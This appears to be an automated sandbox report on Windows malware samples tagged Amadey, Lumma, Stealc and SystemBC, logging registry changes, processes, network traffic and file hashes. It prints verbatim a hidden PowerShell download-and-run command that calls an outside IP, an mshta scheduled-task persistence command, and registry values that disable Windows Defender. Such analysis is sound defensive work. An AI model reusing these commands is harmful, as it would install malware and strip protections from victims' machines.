| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn sCXK4maXN6R /tr "mshta C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE
"C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE"
Network
Files
C:\Users\Admin\AppData\Local\Temp\5WMgEtyym.hta
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nq4kj3qw.14m.ps1
C:\Users\Admin\AppData\Local\TempXXYUCBWWCRHPACBVM1MHEMPNXAOWHCIX.EXE
Analysis: behavioral8
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
146s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f86f46f8,0x7ff8f86f4708,0x7ff8f86f4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 150.171.28.10:443 | | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fffde59525dd5af902ac449748484b15 |
| SHA1 | 243968c68b819f03d15b48fc92029bf11e21bedc |
| SHA256 | 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762 |
| SHA512 | f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645 |
\??\pipe\LOCAL\crashpad_5080_BSPSSOACWQNWCXYB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ab283f88362e9716dd5c324319272528 |
| SHA1 | 84cebc7951a84d497b2c1017095c2c572e3648c4 |
| SHA256 | 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2 |
| SHA512 | 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 10bf642ac57e600422a5a3557ee16d98 |
| SHA1 | e8151529351b298372afa609d858c2c47c76e3e7 |
| SHA256 | db9f95714608f587eccccee430df0a34f8e5c37fdcd211cd1355bacd8a080f3c |
| SHA512 | 55d4915202219328869dda4a58dd9f6ce2584c0946611f6278b6932fa4a7877917ea4df68a0dfcb84ef38d76b9863190048e3b84fbdd6df85d225d5f4b4a787b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e1bf87195c3b140dd67bfd6be1bfc089 |
| SHA1 | 5b383cd439b0c8931f2c3656d549dc1a9d66ab60 |
| SHA256 | cee9bea1e681e859e0dd39c0c1e1f242572e2e3b9cf0b84ffaa4ca1da7b4a0b4 |
| SHA512 | c2ddaca5cc1af9819f8613fa43c012c74d7292729a2d888d2a51513a7ffbf223cb534e64f4f9f5e0fd4d409fca672106e34d3cabcfaf4ee7c67fa5f09062e2bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1ea5a5d84dce5c715a07e64e743bc88c |
| SHA1 | c83b993da9aedaa86ffad66e4dbce0a02525e6af |
| SHA256 | a3a09906137ff4a94cf8d91eb925d84bee69a45b805797ab6bb3850db6ef216e |
| SHA512 | 409b4642388c165465854f68dcc071fa0e6c4f7e56efa18f549eb4b2df459627b240c1c902faf848f86a33c250328078168ba4e17ed5a19d62b0b0263931ed07 |
Analysis: behavioral15
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
GCleaner
Gcleaner family
Lumma Stealer, LummaC
Lumma family
Stealc
Stealc family
SystemBC
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\eltqgcf\oamb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
